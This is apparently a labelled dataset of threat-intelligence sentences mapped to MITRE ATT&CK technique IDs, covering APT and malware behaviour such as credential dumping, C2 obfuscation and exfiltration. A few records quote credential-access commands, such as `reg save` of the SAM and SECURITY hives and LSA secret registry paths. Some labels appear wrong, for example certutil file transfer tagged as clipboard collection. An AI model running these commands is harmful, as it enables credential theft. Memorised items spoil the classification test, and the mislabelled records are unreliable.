{"text1":"In early February 2018, FireEye iSIGHT Intelligence observed Dridex botnet ID 2040 download a Monero cryptocurrency miner based on the open-source XMRig miner.. On Feb. 12, 2018, FireEye iSIGHT Intelligence observed the banking malware IcedID injecting Monero-mining JavaScript into webpages for specific, targeted URLs. The IcedID injects launched an anonymous miner using the mining code from Coinhive's AuthedMine.. In late 2017, Bleeping Computer reported that security researchers with Radware observed the hacking group CodeFork leveraging the popular downloader Andromeda (aka Gamarue) to distribute a miner module to their existing botnets.. In late 2017, FireEye researchers observed Trickbot operators deploy a new module named \"testWormDLL\" that is a statically compiled copy of the popular XMRig Monero miner.. On Aug. 29, 2017, Security Week reported on a variant of the popular Neutrino banking Trojan, including a Monero miner module. According to their reporting, the new variant no longer aims at stealing bank card data, but instead is limited to downloading and executing modules from a remote server.","labels":"['T1588.001']"}
{"text1":"Enabling the macros starts a multi-stage infection chain that eventually downloads and executes a Cobalt Strike beacon, providing the attackers with a foothold inside the target organization.","labels":"['T1588.002']"}
{"text1":"Kaspersky Lab detections for Blue, Black, and Green Lamberts have been triggered by a relatively small set of victims from around the world. \u00a0While investigating one of these infections involving White Lambert (network-driven implant) and Blue Lambert (active implant), we found yet another family of tools that appear to be related. \u00a0We called this new family \u2018Pink Lambert\u2019.","labels":"['T1587.001']"}
{"text1":"In most cases, UNC2165 has stolen data from its victims to use as leverage for extortion after it has deployed ransomware across an environment. In intrusions where the data exfiltration method could be identified, there is evidence to suggest the group used either Rclone or MEGASync to transfer data from the victims' environments prior to encryption. The Rclone utility is used by many financially motivated actors to synchronize sensitive files with cloud storage providers, and MEGASync synchronizes data to the MEGA cloud hosting service.","labels":"['T1537']"}
{"text1":"The Ryuk group went from an email to domain wide ransomware in 29 hours and asked for over $6 million to unlock our systems. They used tools such as Cobalt Strike, AdFind, WMI, vsftpd, PowerShell, PowerView, and Rubeus to accomplish their objective.","labels":"['T1588.002', 'T1059.001']"}
{"text1":"On March 5, 2020, researcher\u00a0Steven Seeley, published an advisory and released\u00a0proof-of-concept code for a zero-day remote code execution vulnerability in Zoho ManageEngine Desktop Central versions prior to 10.0.474 (CVE-2020-10189). Beginning on March 8, FireEye observed APT41 use 91.208.184[.]78 to attempt to exploit the Zoho ManageEngine vulnerability at more than a dozen FireEye customers, which resulted in the compromise of at least five separate customers. FireEye observed two separate variations of how the payloads (install.bat and storesyncsvc.dll) were deployed. In the first variation the CVE-2020-10189 exploit was used to directly upload \u201clogger.zip\u201d, a simple Java based program, which contained a set of commands to use PowerShell to download and execute install.bat and storesyncsvc.dll.","labels":"['T1203']"}
{"text1":"Uploads a file on the victim\u2019s computer to the C&C server","labels":"['T1041']"}
{"text1":"Uses Mimikatz to harvest credentials.","labels":"['T1003.001', 'T1003.001']"}
{"text1":"Prior to encryption, the ransomware will check if the directory is in the root path and avoids the following files and directories","labels":"['T1083']"}
{"text1":"Enumerates remote open SMB network shares","labels":"['T1135']"}
{"text1":"Uses legitimate VPN or Citrix credentials to maintain access to an environment.","labels":"['T1133']"}
{"text1":"Uses tools such as PDQ Inventory scanner, Advanced Port Scanner and netscan (which also scanned for the ProxyShell vulnerability).","labels":"['T1046']"}
{"text1":"The group abuses common cloud services such as Dropbox, OneDrive, and Mega for C&C communications (receive commands and exfiltrate data).","labels":"['T1136.003']"}
{"text1":"Instead of more traditional malware like a Windows executable (.exe) or Dynamic Link Library (.dll), the malware authors used a browser extension as their final payload","labels":"['T1176']"}
{"text1":"Uses 7-Zip to compress stolen data for exfiltration.","labels":"['T1560.001']"}
{"text1":"Stolen digital certificate re-use","labels":"['T1588.004']"}
{"text1":"FormatLoader\u2019s main purpose is to infect the machine with an additional malicious file by downloading the binary to the compromised machine. To do so, the malware adds digits from the hardcoded range one by one to the hardcoded format strings, and accesses the download links.","labels":"['T1105']"}
{"text1":"In its new attack, the actor initiated the infection chain sending a spear-phishing email containing a macro-embedded Word document.","labels":"['T1566.001']"}
{"text1":"Exploits Print Nightmare vulnerability.","labels":"['T1068']"}
{"text1":"Even more, this tiny bootkit with a size of only 80 kb on disk after installation can disable built-in Windows security protection such as Hypervisor-Protected Code Integrity (HVCI) and Windows Defender and bypass User Account Control (UAC).","labels":"['T1548.002']"}
{"text1":"Most PowerShell scripts involved in LockBit 2.0 cases are Base64 encoded.","labels":"['T1140']"}
{"text1":"Although Cobalt Strike has many capabilities beneficial to threat actors in ransomware attacks, it was mainly seen in LockBit 2.0 investigations acting as a command and control beacon, a method of lateral movement and a tool for downloading\/executing files.","labels":"['T1021']"}
{"text1":"BlackMatter harvests credentials from Local Security Authority Subsystem Service (LSASS) memory using procmon.","labels":"['T1003.001']"}
{"text1":"Chinese state-sponsored cyber actors have been observed gaining access to victim networks through watering hole campaigns of typo-squatted domains.","labels":"['T1189']"}
{"text1":"Chinese state-sponsored cyber actors have been observed: \uf0b7 Using cmd.exe, JavaScript\/Jscript Interpreter, and network device command line interpreters (CLI). \uf0b7 Using PowerShell to conduct reconnaissance, enumeration, and discovery of the victim network. \uf0b7 Employing Python scripts to exploit vulnerable servers. \uf0b7 Using a UNIX shell in order to conduct discovery, enumeration, and lateral movement on Linux\u00ae servers in the victim network.","labels":"['T1059.001', 'T1059.003', 'T1059.004', 'T1059.006', 'T1059.007', 'T1059.008']"}
{"text1":"Chinese state-sponsored cyber actors have been observed deleting files using rm or del commands. Several files that the cyber actors target would be timestomped, in order to show different times compared to when those files were created\/used.","labels":"['T1070']"}
{"text1":"Chinese state-sponsored cyber actors have been observed using commands, including tasklist, jobs, ps, or taskmgr, to reveal the running processes on victim devices.","labels":"['T1057']"}
{"text1":"Chinese state-sponsored cyber actors used RDP and execute rdpclip.exe to exfiltrate information from the clipboard.","labels":"['T1115']"}
{"text1":"Chinese state-sponsored cyber actors have been observed importing tools from GitHub or infected domains to victim networks. In some instances. Chinese statesponsored cyber actors used the Server Message Block (SMB) protocol to import tools into victim networks.","labels":"['T1105']"}
{"text1":"Chinese state-sponsored cyber actors have been observed using tools like dog-tunnel and dns2tcp.exe to conceal C2 traffic with existing network activity.","labels":"['T1572']"}
{"text1":"The actors used a Powershell cmdlet (NewManagementRoleAssignment) to grant the 'ApplicationImpersonation' role to a compromised account.","labels":"['T1098.002']"}
{"text1":"The actors used the ntdsutil.exe utility, which was present on a target's Active Directory\u00ae server to export the Active Directory database for credential access.","labels":"['T1003.003']"}
{"text1":"The actors used a variety of utilities, including publicly available versions of WinRAR\u00ae , to archive collected data with password protection.","labels":"['T1560.001']"}
{"text1":"The actors used certutil.exe, a known Living Off the Land\" technique, to transfer a file into a target environment.\"","labels":"['T1115']"}
{"text1":"The Iranian government-sponsored APT actors may have made modifications to the Task Scheduler. These modifications may display as unrecognized scheduled tasks or actions. Specifically, the below established tasks may be associated with this activity: SynchronizeTimeZone GoogleChangeManagement MicrosoftOutLookUpdater MicrosoftOutLookUpdateSchedule","labels":"['T1053.005']"}
{"text1":"Actors used the taskkill command to probably disable security features. CISA was unable to determine which application was associated with the Process ID.","labels":"['T1562.001']"}
{"text1":"The part of the malicious code that drops and executes a payload is nearly identical between the two samples. The legitimate Windows executable C:\\Windows\\System32\\colorcpl.exe is copied to the new directory C:\\ProgramData\\PackageColor and the embedded payload is written to C:\\ProgramData\\PackageColor\\colorui.dll.","labels":"['T1218']"}
{"text1":"Either via the LNK after startup, or directly via the VBS, the command line \u201cwscript.exe \/\/B \/\/E:vbs C:\\Users\\Public\\Favorites\\desktop.ini\u201d is executed, referencing the helper file dropped by the sample mentioned above. Finally, the file C:\\Users\\Public\\ignit.vbs is deleted after execution.","labels":"['T1547.009']"}
{"text1":"\u201cdesktop.ini\u201d is used to invoke regasm.exe to launch the payload found in C:\\Users\\Public\\Libraries\\core.dll as a hidden window without returning any error codes.","labels":"['T1622']"}
{"text1":"The actor's CovalentStealer tool stores collected files on a Microsoft OneDrive cloud folder.","labels":"['T1567.002']"}
{"text1":"The Chrome extension is installed and maintained by a number of plist files written to the user directory ~\/Library\/LaunchAgent\/. To conceal the malicious behavior, the underlying commands in the plist files are obfuscated with Base64 encoding.","labels":"['T1647']"}
{"text1":"The first plist, ~\/Library\/LaunchAgents\/com.safarii.extension.plist, does not use a StartInterval value like the Chrome variant, but instead uses RunAtLoad. The RunAtLoad parameter is executed when the user logs into their computer. Note that the plist file does not use the correct spelling of Safari. ","labels":"['T1647']"}
{"text1":"An attacker runs the MimiKatz tool and launches a DCShadow attack (lsadump::dcshadow)","labels":"['T1207']"}
{"text1":"The Nefilim ransomware uses a batch file to stop services and kill processes in the local host. This batch file abuses taskill.exe using CMD to kill predefined services and processes in the target host. Nefilim distributes this batch file to multiple hosts using two batch files. One of the batch files uses the \u2018copy\u2019 command, and the other one uses WMI with hard-coded admin credentials.","labels":"['T1562.001']"}
{"text1":"Nefilim removes itself from the target systems after infection with the following code: del C:\\Users\\admin\\AppData\\Local\\Temp\\<ransomware_file_name>.exe\" \/s \/f \/q\"","labels":"['T1070.004']"}
{"text1":"The Nefilim ransomware queries volume information (disk volume name and serial number) and Cryptographic Machine GUID. Ransomware families use  Cryptographic Machine GUID and volume serial number to generate a unique identifier for the host for encryption\/decryption processes. Nefilim obtains Cryptographic Machine GUID by querying the value of MachineGuid in the following Registry key: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography","labels":"['T1082']"}
{"text1":"Mandiant identified a campaign where the threat actors gained access to the target organization\u2019s Microsoft 365 environment using a stolen session token. Mandiant analyzed the workstations belonging to the end user and discovered that some systems had been infected with CRYPTBOT, an info-stealer malware, shortly before the stolen session token was generated. Mandiant observed that in some cases the user downloaded the malware after browsing to low reputation websites offering free, or \u201ccracked\u201d, software.","labels":"['T1550.004']"}
{"text1":"when the method R is invoked, InstallUtil.exe is spawned in suspended mode. The memory blocks of the suspended process are unmapped and rewritten with the sections of the payload program passed as an argument to method R. The thread is allowed to continue after changes have been made to the entry point.","labels":"['T1055.012']"}
{"text1":"To facilitate the staging of BEACON on remote systems APT29 utilized a malicious certificate that allowed the group to impersonate a privileged user.","labels":"['T1588.004']"}
{"text1":"It can reflectively load a DLL\/EXE in to the PowerShell process, or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints, please lead the Notes section (GENERAL NOTES) for information on how to use them.","labels":"['T1620']"}
{"text1":"Like the function name says Invoke-ReflectivePEInjection loads an portable executable (PE) file or DLL into the current or remote process memory and executes this file in memory.","labels":"['T1620']"}
{"text1":"Invoke-Mimikatz.ps1 is the PowerShell implementation of Mimikatz. The PowerShell script loads Mimikatz.exe reflectively into the process memory.","labels":"['T1620']"}
{"text1":"Files contained within image files, like mounted ISO files, will not contain the Zone.Identifier Alternate Data Stream (ADS) flag that indicates the files have been downloaded from the internet (so called \u201cmark-of-the-web\u201d) as reported by Didier Stevens.","labels":"['T1553.005']"}
{"text1":"We believe that the modified library file, which we\u2019ve named LOCKPICK, could weaken encryption for communications used by the appliance, but do not have enough evidence to confirm this","labels":"['T1600']"}
{"text1":"In the second variation, FireEye observed APT41 leverage the Microsoft BITSAdmin command-line tool to download install.bat (MD5: 7966c2c546b71e800397a67f942858d0) from known APT41 infrastructure 66.42.98[.]220 on port 12345.","labels":"['T1571']"}
{"text1":"During Operation Wocao, threat actors encrypted IP addresses used for \"Agent\" proxy hops with RC4.","labels":"['T1001']"}
{"text1":"FlawedAmmyy may obfuscate portions of the initial C2 handshake.","labels":"['T1001']"}
{"text1":"FunnyDream can send compressed and obfuscated packets to C2.","labels":"['T1001']"}
{"text1":"Operation Wocao has encrypted IP addresses used for \"Agent\" proxy hops with RC4.","labels":"['T1001']"}
{"text1":"POWRUNER can use base64 encoded C2 communications.","labels":"['T1001', 'T1132.001']"}
{"text1":"RDAT has used encoded data within subdomains as AES ciphertext to communicate from the host to the C2.","labels":"['T1001']"}
{"text1":"SLOTHFULMEDIA has hashed a string containing system information prior to exfiltration via POST requests.","labels":"['T1001']"}
{"text1":"SideTwist can embed C2 responses in the source code of a fake Flickr webpage.","labels":"['T1001']"}
{"text1":"The Axiom group has used other forms of obfuscation, include commingling legitimate traffic with communications traffic so that network streams appear legitimate.","labels":"['T1001']"}
{"text1":"TrailBlazer can masquerade its C2 traffic as legitimate Google Notifications HTTP requests.","labels":"['T1001']"}
{"text1":"Downdelph inserts pseudo-random characters between each original character during encoding of C2 network requests, making it difficult to write signatures on them.","labels":"['T1001.001']"}
{"text1":"GoldMax has used decoy traffic to surround its malicious network traffic to avoid detection.","labels":"['T1001.001']"}
{"text1":"GrimAgent  can pad C2 messages with random generated values.","labels":"['T1001.001']"}
{"text1":"Kevin can generate a sequence of dummy HTTP C2 requests to obscure traffic.","labels":"['T1001.001']"}
{"text1":"P2P ZeuS added junk data to outgoing UDP packets to peer implants.","labels":"['T1001.001']"}
{"text1":"P8RAT can send randomly-generated data as part of its C2 communication.","labels":"['T1001.001']"}
{"text1":"SUNBURST added junk bytes to its C2 over HTTP.","labels":"['T1001.001']"}
{"text1":"TrailBlazer has used random identifier strings to obscure its C2 operations and result codes.","labels":"['T1001.001']"}
{"text1":"Turian can insert pseudo-random characters into its network encryption setup.","labels":"['T1001.001']"}
{"text1":"WellMess can use junk data in the Base64 string for additional obfuscation.","labels":"['T1001.001']"}
{"text1":"APT29 has used steganography to hide C2 communications in images.","labels":"['T1001.002']"}
{"text1":"Axiom has used steganography to hide its C2 communications.","labels":"['T1001.002']"}
{"text1":"Daserf can use steganography to hide malicious code downloaded to the victim.","labels":"['T1001.002']"}
{"text1":"HAMMERTOSS is controlled via commands that are appended to image files.","labels":"['T1001.002']"}
{"text1":"LightNeuron is controlled via commands that are embedded into PDFs and JPGs using steganographic methods.","labels":"['T1001.002']"}
{"text1":"RDAT can process steganographic images attached to email messages to send and receive C2 commands. RDAT can also embed additional messages within BMP images to communicate with the RDAT operator.","labels":"['T1001.002']"}
{"text1":"Sliver can encode binary data into a .PNG file for C2 communication.","labels":"['T1001.002']"}
{"text1":"When the Duqu command and control is operating over HTTP or HTTPS, Duqu uploads data to its controller by appending it to a blank JPG file.","labels":"['T1001.002']"}
{"text1":"Zox has used the .PNG file format for C2 communications.","labels":"['T1001.002']"}
{"text1":"BADCALL uses a FakeTLS method during C2.","labels":"['T1001.003']"}
{"text1":"Bankshot generates a false TLS handshake using a public certificate to disguise C2 network communications.","labels":"['T1001.003']"}
{"text1":"Cobalt Strike can mimic the HTTP protocol for C2 communication, while hiding the actual data in either an HTTP header, URI parameter, the transaction body, or appending it to the URI.","labels":"['T1001.003']"}
{"text1":"FALLCHILL uses fake Transport Layer Security (TLS) to communicate with its C2 server.","labels":"['T1001.003']"}
{"text1":"HARDRAIN uses FakeTLS to communicate with its C2 server.","labels":"['T1001.003']"}
{"text1":"KeyBoy uses custom SSL libraries to impersonate SSL in C2 traffic.","labels":"['T1001.003']"}
{"text1":"Lazarus Group malware also uses a unique form of communication encryption known as FakeTLS that mimics TLS but uses a different encryption method, potentially evading SSL traffic inspection\/decryption.","labels":"['T1001.003']"}
{"text1":"Okrum mimics HTTP protocol for C2 communication, while hiding the actual messages in the Cookie and Set-Cookie headers of the HTTP requests.","labels":"['T1001.003']"}
{"text1":"SUNBURST masqueraded its network traffic as the Orion Improvement Program (OIP) protocol.","labels":"['T1001.003']"}
{"text1":"TAINTEDSCRIBE has used FakeTLS for session authentication.","labels":"['T1001.003']"}
{"text1":"APT28 regularly deploys both publicly available (ex: Mimikatz) and custom password retrieval tools on victims.","labels":"['T1003']"}
{"text1":"APT32 used GetPassword_x64 to harvest credentials.","labels":"['T1003']"}
{"text1":"APT39 has used different versions of Mimikatz to obtain credentials.","labels":"['T1003']"}
{"text1":"Carbanak obtains Windows logon password details.","labels":"['T1003']"}
{"text1":"Dragonfly dropped and executed SecretsDump, a tool that dumps password hashes.","labels":"['T1003']"}
{"text1":"Frankenstein has harvested credentials from the victim's machine using Empire.","labels":"['T1003']"}
{"text1":"KONNI can steal profiles (containing credential information) from Firefox, Chrome, and Opera.","labels":"['T1003', 'T1555.003']"}
{"text1":"Leviathan has used publicly available tools to dump password hashes, including HOMEFRY.","labels":"['T1003']"}
{"text1":"OnionDuke steals credentials from its victims.","labels":"['T1003']"}
{"text1":"PinchDuke steals credentials from compromised hosts. PinchDuke's credential stealing functionality is believed to be based on the source code of the Pinch credential stealing malware (also known as LdPinch). Credentials targeted by PinchDuke include ones associated many sources such as WinInet Credential Cache, and Lightweight Directory Access Protocol (LDAP).","labels":"['T1003']"}
{"text1":"Poseidon Group conducts credential dumping on victims, with a focus on obtaining credentials belonging to domain and database servers.","labels":"['T1003']"}
{"text1":"Revenge RAT has a plugin for credential harvesting.","labels":"['T1003']"}
{"text1":"Sowbug has used credential dumping tools.","labels":"['T1003']"}
{"text1":"Suckfly used a signed credential-dumping tool to obtain victim account credentials.","labels":"['T1003']"}
{"text1":"APT32 used Mimikatz and customized versions of Windows Credential Dumper to harvest credentials.","labels":"['T1003.001']"}
{"text1":"APT39 has used Mimikatz, Windows Credential Editor and ProcDump to dump credentials.","labels":"['T1003.001']"}
{"text1":"APT41 has used hashdump, Mimikatz, and the Windows Credential Editor to dump password hashes from memory and authenticate to other user accounts.","labels":"['T1003.001']"}
{"text1":"Aquatic Panda has attempted to harvest credentials through LSASS memory dumping.","labels":"['T1003.001']"}
{"text1":"BRONZE BUTLER has used various tools (such as Mimikatz and WCE) to perform credential dumping.","labels":"['T1003.001']"}
{"text1":"Blue Mockingbird has used Mimikatz to retrieve credentials from LSASS memory.","labels":"['T1003.001']"}
{"text1":"Cleaver has been known to dump credentials using Mimikatz and Windows Credential Editor.","labels":"['T1003.001']"}
{"text1":"Cobalt Strike can spawn a job to inject into LSASS memory and dump password hashes.","labels":"['T1003.001']"}
{"text1":"CozyCar has executed Mimikatz to harvest stored credentials from the victim and further victim penetration.","labels":"['T1003.001']"}
{"text1":"Daserf leverages Mimikatz and Windows Credential Editor to steal credentials.","labels":"['T1003.001']"}
{"text1":"During Operation Wocao, threat actors used ProcDump to dump credentials from memory.","labels":"['T1003.001']"}
{"text1":"Earth Lusca has used ProcDump to obtain the hashes of credentials by dumping the memory of the LSASS process.","labels":"['T1003.001']"}
{"text1":"Emotet has been observed dropping password grabber modules including Mimikatz.","labels":"['T1003.001']"}
{"text1":"FIN8 harvests credentials using Invoke-Mimikatz or Windows Credentials Editor (WCE).","labels":"['T1003.001']"}
{"text1":"GALLIUM used a modified version of Mimikatz along with a PowerShell-based Mimikatz to dump credentials on the victim machines.","labels":"['T1003.001']"}
{"text1":"GreyEnergy has a module for Mimikatz to collect Windows credentials from the victim\u2019s machine.","labels":"['T1003.001']"}
{"text1":"HAFNIUM has used \"procdump\" to dump the LSASS process memory.","labels":"['T1003.001']"}
{"text1":"Kimsuky has gathered credentials using Mimikatz and ProcDump.","labels":"['T1003.001']"}
{"text1":"LaZagne can perform credential dumping from memory to obtain account and password information.","labels":"['T1003.001']"}
{"text1":"Leafminer used several tools for retrieving login and password information, including LaZagne and Mimikatz.","labels":"['T1003.001']"}
{"text1":"Lizar can run Mimikatz to harvest credentials.","labels":"['T1003.001']"}
{"text1":"Magic Hound has stolen domain credentials by dumping LSASS process memory with comsvcs.dll and from a Microsoft Active Directory Domain Controller using Mimikatz.","labels":"['T1003.001']"}
{"text1":"Mimikatz performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from the LSASS Memory.","labels":"['T1003.001']"}
{"text1":"OilRig has used credential dumping tools such as Mimikatz to steal credentials to accounts logged into the compromised system and to Outlook Web Access.","labels":"['T1003.001']"}
{"text1":"Okrum was seen using MimikatzLite to perform credential dumping.","labels":"['T1003.001']"}
{"text1":"Operation Wocao has used ProcDump to dump credentials from memory.","labels":"['T1003.001']"}
{"text1":"PLATINUM has used keyloggers that are also capable of dumping credentials.","labels":"['T1003.001']"}
{"text1":"PoetRAT used voStro.exe, a compiled pypykatz (Python version of Mimikatz), to steal credentials.","labels":"['T1003.001']"}
{"text1":"PoshC2 contains an implementation of Mimikatz to gather credentials from memory.","labels":"['T1003.001']"}
{"text1":"PowerSploit contains a collection of Exfiltration modules that can harvest credentials using Mimikatz.","labels":"['T1003.001']"}
{"text1":"Pupy can execute Lazagne as well as Mimikatz using PowerShell.","labels":"['T1003.001']"}
{"text1":"Pysa can perform OS credential dumping using Mimikatz.","labels":"['T1003.001']"}
{"text1":"SILENTTRINITY can create a memory dump of LSASS via the `MiniDumpWriteDump Win32` API call.","labels":"['T1003.001']"}
{"text1":"Sandworm Team's plainpwd tool is a modified version of Mimikatz and dumps Windows credentials from system memory.","labels":"['T1003.001']"}
{"text1":"SecretsDump and Mimikatz modules within Impacket can perform credential dumping to obtain account and password information.","labels":"['T1003.001', 'T1003.002', 'T1003.004']"}
{"text1":"Silence has used the Farse6.1 utility (based on Mimikatz) to extract credentials from lsass.exe.","labels":"['T1003.001']"}
{"text1":"Stolen Pencil gathers credentials using Mimikatz and Procdump.","labels":"['T1003.001']"}
{"text1":"TEMP.Veles has used Mimikatz and a custom tool, SecHack, to harvest credentials.","labels":"['T1003.001']"}
{"text1":"Whitefly has used Mimikatz to obtain credentials.","labels":"['T1003.001']"}
{"text1":"Windows Credential Editor can dump credentials.","labels":"['T1003.001']"}
{"text1":"Cobalt Strike can recover hashed passwords.","labels":"['T1003.002']"}
{"text1":"Dragonfly has dropped and executed SecretsDump to dump password hashes.","labels":"['T1003.002', 'T1003.004']"}
{"text1":"During Night Dragon, threat actors dumped account hashes using gsecdump.","labels":"['T1003.002']"}
{"text1":"During Operation CuckooBees, the threat actors leveraged a custom tool to dump OS credentials and used following commands: `reg save HKLM\\\\SYSTEM system.hiv`, `reg save HKLM\\\\SAM sam.hiv`, and `reg save HKLM\\\\SECURITY security.hiv`, to dump SAM, SYSTEM and SECURITY hives.","labels":"['T1003.002']"}
{"text1":"Fgdump can dump Windows password hashes.","labels":"['T1003.002']"}
{"text1":"HOPLIGHT has the capability to harvest credentials and passwords from the SAM database.","labels":"['T1003.002']"}
{"text1":"Ke3chang has dumped credentials, including by using gsecdump.","labels":"['T1003.002', 'T1003.004']"}
{"text1":"Koadic can gather hashed passwords by dumping SAM\/SECURITY hive.","labels":"['T1003.002']"}
{"text1":"Mimikatz performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from the SAM table.","labels":"['T1003.002']"}
{"text1":"Mivast has the capability to gather NTLM password information.","labels":"['T1003.002']"}
{"text1":"Night Dragon has dumped account hashes with Carbanak and cracked them with Cain & Abel.","labels":"['T1003.002']"}
{"text1":"POWERTON has the ability to dump password hashes.","labels":"['T1003.002']"}
{"text1":"Remsec can dump the SAM database.","labels":"['T1003.002']"}
{"text1":"Threat Group-3390 actors have used gsecdump to dump credentials. They have also dumped credentials from domain controllers.","labels":"['T1003.002', 'T1003.004']"}
{"text1":"Wizard Spider has acquired credentials from the SAM\/SECURITY registry hives.","labels":"['T1003.002']"}
{"text1":"gsecdump can dump Windows password hashes from the SAM.","labels":"['T1003.002']"}
{"text1":"CrackMapExec can dump hashed passwords associated with Active Directory using Windows' Directory Replication Services API (DRSUAPI), or Volume Shadow Copy.","labels":"['T1003.003']"}
{"text1":"HAFNIUM has stolen copies of the Active Directory database (NTDS.DIT).","labels":"['T1003.003']"}
{"text1":"Ke3chang has used NTDSDump and other password dumping tools to gather credentials.","labels":"['T1003.003']"}
{"text1":"Koadic can gather hashed passwords by gathering domain controller hashes from NTDS.","labels":"['T1003.003']"}
{"text1":"LAPSUS$ has used Windows built-in tool `ntdsutil` to extract the Active Directory (AD) database.","labels":"['T1003.003']"}
{"text1":"Mustang Panda has used vssadmin to create a volume shadow copy and retrieve the NTDS.dit file. Mustang Panda has also used \"reg save\" on the SYSTEM file Registry location to help extract the NTDS.dit file.","labels":"['T1003.003']"}
{"text1":"SecretsDump and Mimikatz modules within Impacket can perform credential dumping to obtain account and password information from NTDS.dit.","labels":"['T1003.003']"}
{"text1":"Wizard Spider has gained access to credentials via exported copies of the ntds.dit Active Directory database.","labels":"['T1003.003']"}
{"text1":"esentutl can use Volume Shadow Copy to copy locked files such as ntds.dit.","labels":"['T1003.003']"}
{"text1":"menuPass has used Ntdsutil to dump credentials.","labels":"['T1003.003']"}
{"text1":"AADInternals can dump secrets from the Local Security Authority.","labels":"['T1003.004']"}
{"text1":"APT33 has used a variety of publicly available tools like LaZagne to gather credentials.","labels":"['T1003.004', 'T1003.005', 'T1552.001', 'T1555', 'T1555.003']"}
{"text1":"CosmicDuke collects LSA secrets.","labels":"['T1003.004']"}
{"text1":"CrackMapExec can dump hashed passwords from LSA secrets for the targeted system.","labels":"['T1003.004']"}
{"text1":"IceApple's Credential Dumper module can dump LSA secrets from registry keys, including: `HKLM\\SECURITY\\Policy\\PolEKList\\default`, `HKLM\\SECURITY\\Policy\\Secrets\\*\\CurrVal`, and `HKLM\\SECURITY\\Policy\\Secrets\\*\\OldVal`.","labels":"['T1003.004']"}
{"text1":"Leafminer used several tools for retrieving login and password information, including LaZagne.","labels":"['T1003.004', 'T1003.005', 'T1552.001', 'T1555', 'T1555.003']"}
{"text1":"MuddyWater has performed credential dumping with LaZagne.","labels":"['T1003.004', 'T1003.005']"}
{"text1":"OilRig has used credential dumping tools such as LaZagne to steal credentials to accounts logged into the compromised system and to Outlook Web Access.","labels":"['T1003.004', 'T1003.005', 'T1552.001', 'T1555']"}
{"text1":"Cachedump can extract cached password hashes from cache entry information.","labels":"['T1003.005']"}
{"text1":"LaZagne can perform credential dumping from MSCache to obtain account and password information.","labels":"['T1003.005']"}
{"text1":"Okrum was seen using modified Quarks PwDump to perform credential dumping.","labels":"['T1003.005']"}
{"text1":"APT29 leveraged privileged accounts to replicate directory service data with domain controllers.","labels":"['T1003.006']"}
{"text1":"Earth Lusca has used a \"DCSync\" command with Mimikatz to retrieve credentials from an exploited controller.","labels":"['T1003.006']"}
{"text1":"LAPSUS$ has used DCSync attacks to gather credentials for privilege escalation routines.","labels":"['T1003.006']"}
{"text1":"Mimikatz performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from DCSync\/NetSync.","labels":"['T1003.006']"}
{"text1":"Operation Wocao has used Mimikatz's DCSync to dump credentials from the memory of the targeted system.","labels":"['T1003.006']"}
{"text1":"UNC2452 leveraged privileged accounts to replicate directory service data with domain controllers.","labels":"['T1003.006']"}
{"text1":"LaZagne can obtain credential information running Linux processes.","labels":"['T1003.007']"}
{"text1":"MimiPenguin can dump process memory and extract clear-text credentials.","labels":"['T1003.007']"}
{"text1":"LaZagne can obtain credential information from \/etc\/shadow using the shadow.py module.","labels":"['T1003.008']"}
{"text1":"APT28 has retrieved internal documents from machines inside victim environments, including by using Forfiles to stage documents before exfiltration.","labels":"['T1005']"}
{"text1":"APT29 has extracted files from compromised networks.","labels":"['T1005']"}
{"text1":"APT3 will identify Microsoft Office documents on the victim's computer.","labels":"['T1005']"}
{"text1":"APT37 has collected data from victims' local systems.","labels":"['T1005']"}
{"text1":"APT39 has used various tools to steal files from the compromised host.","labels":"['T1005']"}
{"text1":"Action RAT can collect local data from an infected machine.","labels":"['T1005']"}
{"text1":"AppleSeed can collect data on a compromised host.","labels":"['T1005']"}
{"text1":"AuTo Stealer can collect data such as PowerPoint files, Word documents, Excel files, PDF files, text files, database files, and image files from an infected machine.","labels":"['T1005']"}
{"text1":"Axiom has collected data from a compromised network.","labels":"['T1005']"}
{"text1":"BRONZE BUTLER has exfiltrated files stolen from local systems.","labels":"['T1005']"}
{"text1":"BadPatch collects files from the local system that have the following extensions, then prepares them for exfiltration: .xls, .xlsx, .pdf, .mdb, .rar, .zip, .doc, .docx.","labels":"['T1005']"}
{"text1":"Bandook can collect local files from the system .","labels":"['T1005']"}
{"text1":"Bankshot collects files from the local system.","labels":"['T1005']"}
{"text1":"Bazar can retrieve information from the infected machine.","labels":"['T1005']"}
{"text1":"Bumblebee can capture and compress stolen credentials from the Registry and volume shadow copies.","labels":"['T1005']"}
{"text1":"Calisto can collect data from user directories.","labels":"['T1005']"}
{"text1":"Caterpillar WebShell has a module to collect information from the local database.","labels":"['T1005']"}
{"text1":"China Chopper's server component can upload local files.","labels":"['T1005']"}
{"text1":"Chrommme can collect data from a local system.","labels":"['T1005']"}
{"text1":"Clambling can collect information from a compromised host.","labels":"['T1005']"}
{"text1":"Cobalt Strike can collect data from a local system.","labels":"['T1005']"}
{"text1":"CookieMiner has retrieved iPhone text messages from iTunes phone backup files.","labels":"['T1005']"}
{"text1":"CosmicDuke steals user files from local hard drives with file extensions that match a predefined list.","labels":"['T1005']"}
{"text1":"Crutch can exfiltrate files from compromised systems.","labels":"['T1005']"}
{"text1":"Cyclops Blink can upload files from a compromised host.","labels":"['T1005']"}
{"text1":"DRATzarus can collect information from a compromised host.","labels":"['T1005']"}
{"text1":"DnsSystem can upload files from infected machines after receiving a command with `uploaddd` in the string.","labels":"['T1005']"}
{"text1":"Dragonfly 2.0 collected data from local victim systems.","labels":"['T1005']"}
{"text1":"Dtrack can collect a variety of information from victim machines.","labels":"['T1005']"}
{"text1":"During C0015, the threat actors obtained files and data from the compromised network.","labels":"['T1005']"}
{"text1":"During Frankenstein, the threat actors used Empire to gather various local system information.","labels":"['T1005']"}
{"text1":"During Night Dragon, the threat actors collected files and other data from compromised systems.","labels":"['T1005']"}
{"text1":"During Operation CuckooBees, the threat actors collected data, files, and other information from compromised networks.","labels":"['T1005']"}
{"text1":"During Operation Honeybee, the threat actors collected data from compromised hosts.","labels":"['T1005']"}
{"text1":"Dust Storm has used Android backdoors capable of exfiltrating specific files directly from the infected devices.","labels":"['T1005']"}
{"text1":"FIN7 has collected files and other sensitive information from a compromised network.","labels":"['T1005']"}
